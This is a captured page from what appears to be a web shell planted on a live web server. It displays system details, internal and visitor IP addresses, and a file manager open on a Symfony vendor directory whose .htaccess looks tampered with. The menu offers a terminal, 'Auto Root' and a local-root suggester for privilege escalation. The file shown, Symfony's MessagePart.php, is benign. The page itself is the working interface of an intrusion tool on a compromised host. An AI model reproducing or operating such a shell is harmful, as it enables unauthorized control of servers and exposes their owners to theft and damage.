Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
mime /
Part /
Delete
Unzip
Name
Size
Permission
Date
Action
Multipart
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
AbstractMultipartPart.php
2.23
KB
-rwxrwxr-x
2026-03-30 09:31
AbstractPart.php
1.49
KB
-rwxrwxr-x
2026-03-30 09:31
DataPart.php
4.5
KB
-rwxrwxr-x
2026-03-30 09:31
File.php
1.07
KB
-rwxrwxr-x
2026-03-30 09:31
MessagePart.php
1.53
KB
-rwxrwxr-x
2026-03-30 09:31
SMimePart.php
2.53
KB
-rwxrwxr-x
2026-03-30 09:31
TextPart.php
7.19
KB
-rwxrwxr-x
2026-03-30 09:31
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Mime\Part; use Symfony\Component\Mime\Message; use Symfony\Component\Mime\RawMessage; /** * @final * * @author Fabien Potencier <fabien@symfony.com> */ class MessagePart extends DataPart { private RawMessage $message; public function __construct(RawMessage $message) { if ($message instanceof Message) { $name = $message->getHeaders()->getHeaderBody('Subject').'.eml'; } else { $name = 'email.eml'; } parent::__construct('', $name); $this->message = $message; } public function getMediaType(): string { return 'message'; } public function getMediaSubtype(): string { return 'rfc822'; } public function getBody(): string { return $this->message->toString(); } public function bodyToString(): string { return $this->getBody(); } public function bodyToIterable(): iterable { return $this->message->toIterable(); } public function __serialize(): array { return ['message' => $this->message]; } public function __unserialize(array $data): void { $this->message = $data['message'] ?? $data["\0".self::class."\0message"]; $this->__construct($this->message); } }